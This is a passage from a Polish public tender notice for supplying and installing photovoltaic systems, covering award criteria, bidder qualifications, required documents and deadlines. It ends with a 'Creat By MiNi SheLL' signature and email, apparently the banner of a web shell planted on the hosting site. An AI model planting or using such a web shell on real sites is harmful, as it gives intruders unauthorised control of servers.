datą dostawy do Zamawiającego. <br/>22)	Zamawiający dopuszcza zmianę lokalizacji dostawy i montażu instalacji fotowoltaicznej w porównaniu z zestawieniem lokalizacji określonym w załączniku nr 1a do SWZ, w przypadku, gdy użytkownik danej instalacji fotowoltaicznej zrezygnuje z montażu, a montaż będzie możliwy u innej osoby.<br/>23)	Wykonanie przedmiotu zamówienia zgodnie z Harmonogramem rzeczowo - finansowym - zgodnie z SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">44112410-5 - Konstrukcje dachowe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <p class="mb-0">71326000-9 - Dodatkowe usługi budowlane</p> <p class="mb-0">71334000-8 - Mechaniczne i elektryczne usługi inżynieryjne</p> <p class="mb-0">31712331-9 - Fotoogniwa</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <p class="mb-0">09331100-9 - Kolektory słoneczne do produkcji ciepła</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował kryteriami i ich wagą określonymi poniżej.<br/>2. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. <br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą liczbą punktów określonych w kryteriach. <br/>a)	Kryterium cena = 60%, (Wc)<br/>Wc = 60 * Cn/Cb Gdzie:<br/>Wc - wartość punktowa<br/>Cn - najniższa cena ofertowa<br/>Cb - cena badanej oferty<br/>Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>b)	Kryterium termin wykonania zamówienia = 40%, (T)<br/>Punkty w kryterium „Termin wykonania zamówienia” (T) będą liczone w sposób następujący:<br/>Zaoferowany termin wykonania zamówienia do dnia 30 listopada 2023 r.– 0 pkt, <br/> Zaoferowany termin wykonania zamówienia do dnia 22 listopada 2023 r.– 20 pkt, <br/> Zaoferowany termin wykonania zamówienia do dnia 15 listopada 2023 r.– 40 pkt.<br/> <br/> Za najkorzystniejszą zostanie wybrana oferta, która uzyska najwyższą liczbę punktów liczoną wg wzoru:<br/>Liczba zdobytych punktów = Wc + T<br/>Gdzie:<br/>Wc – liczba punktów uzyskanych w kryterium cena<br/>T – liczba punktów uzyskanych w kryterium termin wykonania zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Rozdziale 25,26,26A,26B SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>W zakresie spełnienia warunku wymagane jest wykazanie przez Wykonawcę:<br/>•	opłaconego ubezpieczenia Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 700 000,00 zł (słownie: siedemset tysięcy złotych); <br/>4)	zdolności technicznej lub zawodowej: <br/> W zakresie spełnienia warunku wymagane jest wykazanie przez Wykonawcę:<br/>Posiadanie doświadczenia zawodowego:<br/>1)	dysponują wiedzą i doświadczeniem do wykonania zamówienia:<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali w sposób należyty i prawidłowo ukończyli co najmniej trzy zamówienia (3 umowy) tj. polegające na dostawie i montażu instalacji fotowoltaicznych albo wykonaniu robót budowlanych obejmujących dostawę i montaż instalacji fotowoltaicznych lub usługi w zakresie dostawy i montażu instalacji fotowoltaicznych, o wartości instalacji fotowoltaicznych o łącznej wartości co najmniej 500.000,00 zł brutto (pięćset tysięcy złotych);<br/>2)	dysponują osobami zdolnymi do wykonania zamówienia:<br/>a)	co najmniej jedną osobą posiadającą:<br/>-	uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno - budowlanej (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - Dz. U. 2021 r. poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>-	wpis na listę członków właściwej izby samorządu zawodowego,<br/>b)	co najmniej jedną osobą posiadającą:<br/>-	uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych (z zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - Dz. U. 2021 r. poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>-	wpis na listę członków właściwej izby samorządu zawodowego,<br/>c)	co najmniej jedną osobą posiadającą:<br/>-	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - Dz. U. 2021 r. poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>-	wpis na listę członków właściwej izby samorządu zawodowego,<br/>d)	co najmniej jedną osobą posiadającą:<br/>-	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodnie <br/>z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - Dz. U. 2021 r. poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>-	wpis na listę członków właściwej izby samorządu zawodowego,<br/>3.	W przypadku warunku zdolności technicznej lub zawodowej, w zakresie dysponowania osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za projektowanie lub/i kierowanie robotami budowlanymi, w których zamawiający określa taki warunek udziału w postępowaniu, zamawiający uznaje wymagane uprawnienia do projektowania lub/i kierowania robotami budowlanymi określone w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) oraz uprawnienia obowiązujące wydane na podstawie wcześniej obowiązujących przepisów prawnych, a także zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz. U. z 2021 r., poz. 2351 z późn. zm.), zamawiający uznaje również wymagane uprawnienia budowlane do kierowania robotami budowlanymi nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r., poz. 334 z późn. zm.). <br/>W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ust. 2 ustawy z dnia <br/>15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. z 2019 r. poz. 1117 z późn. zm.), osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do projektowania lub/i kierowania robotami budowlanymi, jeżeli: <br/>a)	nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowania robotami budowlanymi oraz <br/>b)	posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych - zostały spełnione w stosunku do tych osób wymagania, o których mowa w przepisach ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. z 2019 r. poz. 1117 z późn. zm.), dotyczące świadczenia usług transgranicznych.<br/>4.	Zamawiający dopuszcza łączenie funkcji wymienionych w pkt. 27.2 ppkt. 4).<br/>5.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnianie warunku przez Wykonawców. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 117 ust. 4 ustawy Pzp, dołączają do oferty oświadczenie, z którego wynika, które usługi, dostawy lub roboty budowlane wykonają poszczególni wykonawcy, według wzoru stanowiącego załącznik nr 6 do SWZ.<br/>6.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Do oferty Wykonawca zobowiązany jest dołączyć:<br/>a)	Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 125 ust. 1 ustawy Pzp z wykorzystaniem wzoru – załącznik nr 3 do SWZ. <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (konsorcja) lub spółki cywilne, oświadczenie składa każdy z Wykonawców z wykorzystaniem wzoru – załącznik nr 3b do SWZ. Oświadczenie potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>b) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, załącza do oferty zgodnie z art. 125 ust. 1 Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby – załącznik nr 3a do SWZ,<br/>c)	Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia składane na podstawie art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie w jakim Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenie to składa każdy z Wykonawców wspólnie ubiegających się o zamówienie - załącznik nr 7 do SWZ.<br/>d) Oświadczenie wykonawcy w zakresie art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 229 z 31.7.2014, str. 1), w brzmieniu nadanym rozporządzeniem Rady (UE) 2022/576 w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 111 z 8.4.2022, str. 1) oraz art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129 ze zm.) o braku podstaw do wykluczenia – wzór stanowi Załącznik nr 11 (w przypadku Wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby – wzór stanowi Załącznik nr 11a); <br/>2. Zamawiający przed wyborem najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/>1)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp złożonym do oferty na formularzu załącznika nr 3, w zakresie odnoszącym się do podstaw wykluczenia wskazanych w:<br/>-	art. 108 ust. 1 pkt. 3 Pzp, <br/>-	art. 108 ust. 1 pkt. 4 Pzp dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego, <br/>-	art. 108 ust. 1 pkt. 5 Pzp dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>-	art. 108 ust. 1 pkt. 6 Pzp; <br/>-	art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie,<br/>-	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>wzór oświadczenia stanowi Załącznik nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć:<br/>a)	wypełniony i podpisany Formularz ofertowy wraz z arkuszem wyceny, <br/>wg wzoru – załącznik nr 1 do SWZ. <br/>b)	Pełnomocnictwo upoważniające do złożenia oferty – o ile ofertę składa pełnomocnik - zgodnie z SWZ. <br/>c)	Wykonawca polegający na zdolnościach lub sytuacji podmiotów udostępniających zasoby - zgodnie z SWZ – załącznik nr 5 do SWZ,<br/>d)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, załącza do oferty zgodnie z SWZ – załącznik nr 3a do SWZ,<br/>e)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp - zgodnie z SWZ - załącznik nr 6 do SWZ,<br/>f)	Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia składane na podstawie art. 125 ust. 1 ustawy Pzp - załącznik nr 7 do SWZ.<br/>2. Zamawiający przed wyborem najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/>a)	Wykaz dostaw, robót budowlanych lub usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy roboty budowlane lub usługi zostały wykonane oraz załączeniem dowodów określających, czy te dostawy, roboty budowlane lub usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy – wzór oświadczenia stanowi Załącznik nr 5 do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi wykonawcami, wówczas w powyższym wykazie zobowiązany jest podać jedynie te dostawy w których wykonaniu wykonawca ten bezpośrednio uczestniczył. <br/>b)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za zaprojektowanie instalacji fotowoltaicznych oraz odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg załącznika nr 9 do SWZ. <br/>c)	Potwierdzenie opłaconego ubezpieczenia Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną: nie mniejszą niż 700 000,00 zł (słownie: siedemset tysięcy złotych)<br/>d)	Informacji z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>e)	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej - zgodnie z SWZ - zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ.<br/>f)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed jego/jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium do dnia 28.07.2023 r. do godz. 10:00 w wysokości: <br/>– 7000,00 zł(słownie: siedem tysięcy złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (konsorcja) lub spółki cywilne, oświadczenie składa każdy z Wykonawców z wykorzystaniem wzoru – załącznik nr 3b do SWZ. Oświadczenie potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>2.	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp - Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy - załącznik nr 6 do SWZ,<br/>3. Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia składane na podstawie art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie w jakim Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenie to składa każdy z Wykonawców wspólnie ubiegających się o zamówienie - załącznik nr 7 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian umowy w przypadkach określonych w art. 455 Prawo zamówień publicznych, ustawach odrębnych lub w związku z wystąpieniem co najmniej jednego z następujących przypadków określonych w § 17 ust.1 pkt 1)-10) projektu umowy stanowiącej załącznik r 2 do SWZ.<br/>2.	Zamawiający przewiduje możliwość dokonania zmiany terminu realizacji zamówienia lub jego terminów pośrednich w przypadku określonym w § 17 ust.2 lit. a)-i) projektu umowy stanowiącej załącznik r 2 do SWZ.<br/>3.	Za przedłużenie terminu realizacji zamówienia Wykonawcy nie przysługuje dodatkowe wynagrodzenie. <br/>4.	Zamawiający nie dopuszcza zmiany terminu wykonania zamówienia w przypadkach zawinionych przez Wykonawcę.<br/>5.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty.<br/>6.	Dopuszcza się zmiany, niezależnie od ich wartości, o ile nie są istotne w rozumieniu art. 454 ust. 2 ustawy Prawo zamówień publicznych.<br/>7.	Wprowadzenie zmiany postanowień umowy wymaga aneksu sporządzonego w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com